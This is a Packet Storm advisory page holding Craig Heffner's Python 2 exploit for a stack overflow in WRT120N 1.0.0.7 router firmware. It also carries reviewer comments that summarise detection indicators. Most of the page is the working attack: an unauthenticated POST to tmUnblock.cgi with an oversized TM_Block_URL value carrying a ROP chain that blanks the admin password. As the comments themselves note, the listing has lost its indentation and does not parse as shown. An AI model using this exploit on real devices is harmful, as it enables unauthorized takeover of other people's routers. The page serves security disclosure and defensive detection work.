WRT120N 1.0.0.7 Stack Overflow

2014-02-20T00:00:00
ID PACKETSTORM:125306
Type packetstorm
Reporter Craig Heffner
Modified 2014-02-20T00:00:00

Description

                                        
                                            `#!/usr/bin/env python  
#
# WRT120N v1.0.0.7 stack overflow, ROP to 4-byte overwrite which clears the admin password.
#
# Craig Heffner
# http://www.devttys0.com
# 2014-02-14
#
# NOTE(review): Python 2 only (print statement, urllib2). As rendered on this
# page the listing has lost the indentation of the try/except and for bodies
# below, so it does not parse as shown.
#
# Defender's summary of what the script demonstrates: one POST to
# /cgi-bin/tmUnblock.cgi, sent without any credentials, whose TM_Block_URL
# parameter is several hundred bytes long (246 bytes of filler plus the frames
# built below) reaches the saved return address. The script treats an HTTP 500
# from that CGI as success, so a 500 from tmUnblock.cgi following an oversized
# TM_Block_URL value is the request-level indicator to alert on; the intended
# effect is a blanked admin password, so a subsequent admin login with an empty
# password is the follow-on indicator. No fixed firmware version is named on
# this page.

import sys

import urllib2

# The only argument is the target host; a missing argument prints usage and exits 1.
try:
target = sys.argv[1]
except IndexError:
print "Usage: %s <target ip>" % sys.argv[0]
sys.exit(1)

# Bare hosts are assumed to be plain http; a URL with a scheme is used as given.
url = target + '/cgi-bin/tmUnblock.cgi'
if '://' not in url:
url = 'http://' + url

# Request body. Everything after "TM_Block_URL=" is the oversized value; the
# MAC is a fixed dummy and period=0 is constant.
post_data = "period=0&TM_Block_MAC=00:01:02:03:04:05&TM_Block_URL="
post_data += "B" * 246 # Filler
post_data += "\x81\x54\x4A\xF0" # $s0, address of admin password in memory
post_data += "\x80\x31\xF6\x34" # $ra
post_data += "C" * 0x28 # Stack filler
post_data += "D" * 4 # ROP 1 $s0, don't care
post_data += "\x80\x34\x71\xB8" # ROP 1 $ra (address of ROP 2)
post_data += "E" * 8 # Stack filler

# Four repeated frames; i/3 is Python 2 integer division, so the trailing
# filler is 4 bytes for i = 0..2 and 1 byte for i = 3.
for i in range(0, 4):
post_data += "F" * 4 # ROP 2 $s0, don't care
post_data += "G" * 4 # ROP 2 $s1, don't care
post_data += "\x80\x34\x71\xB8" # ROP 2 $ra (address of itself)
post_data += "H" * (4-(3*(i/3))) # Stack filler; needs to be 4 bytes except for the
# last stack frame where it needs to be 1 byte (to
# account for the trailing "\n\n" and terminating
# NULL byte)

# A 500 is the only response reported as "OK"; other HTTP errors are printed,
# and a non-error response produces no output at all (nothing is checked on
# the success path). Non-HTTP failures (e.g. connection refused) are not
# caught and will raise.
try:
req = urllib2.Request(url, post_data)
res = urllib2.urlopen(req)
except urllib2.HTTPError as e:
if e.code == 500:
print "OK"
else:
print "Received unexpected server response:", str(e)
except KeyboardInterrupt:
pass
`